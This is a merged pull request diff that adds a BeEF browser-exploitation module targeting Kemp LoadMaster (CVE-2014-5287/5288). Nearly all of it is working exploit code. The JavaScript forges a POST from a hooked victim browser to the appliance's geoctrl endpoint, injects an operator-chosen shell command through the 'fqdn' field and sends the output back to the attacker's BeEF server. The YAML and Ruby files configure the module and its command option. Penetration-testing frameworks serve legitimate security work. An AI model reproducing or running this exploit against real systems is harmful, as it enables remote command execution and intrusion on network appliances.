Kemp Load Master RCE - BeEF module #1104

Merged
merged 1 commit into from Apr 4, 2015
Jump to file or symbol
Failed to load files and symbols.
+74 −0
Diff settings

Always

Just for now

@@ -0,0 +1,37 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var timeout = '<%= @timeout %>';
+
+
+ var path = '/progs/geoctrl/doadd';
+ var cmd = "<%= @cmd %>";
+
+ if (rhost.substring(0,5) == "https") {
+ rhost = rhost.replace("https://","")
+ protocol = "https"
+ }
+ else {
+ rhost = rhost.replace("http://","")
+ protocol = "http"
+ }
+
+
+ beef.net.forge_request(protocol, "POST", rhost, rport, path, null, null, { fqdn: "' <%= @cmd %>'" }, 10, 'html', false, null, function(response) {
+ resp = response.headers+response.response_body;
+ start = resp.indexOf("Content-Type: text/html");
+ end = resp.indexOf("Cache-Control: no-cache");
+ final = resp.slice(start+23,end)
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, final)
+ });
+
+
+
+ });
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ kemp_command_execution:
+ enable: true
+ category: "Exploits"
+ name: "Kemp LoadBalancer Command Execution"
+ description: "This module exploits a remote code execution vulnerability in Kemp LoadBalancer 7.1-16.<br/>More information can be found here: <a href='http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html'>http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html</a><br/>"
+ authors: ["Roberto Suggi Liverani", "@malerisch", "CVE-2014-5287","CVE-2014-5288"]
+ target:
+ working: ["ALL"]
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Kemp_command_execution < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name'=>'rhost', 'ui_label' => 'URL', 'value' => 'https://x.x.x.x'},
+ {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '443'},
+ {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
+ {'name'=>'cmd', 'ui_label' => 'Command', 'description' => 'Enter shell command to execute.', 'type'=>'textarea', 'value'=>"ls", 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']}) if not @datastore['result'].nil?
+ save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
+ end
+
+end